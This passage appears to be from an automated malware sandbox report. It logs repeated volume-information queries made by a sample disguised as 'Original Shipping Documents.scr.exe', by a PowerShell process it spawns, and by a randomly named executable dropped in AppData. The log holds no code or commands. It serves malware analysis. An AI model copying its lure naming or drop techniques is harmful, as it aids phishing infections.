Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
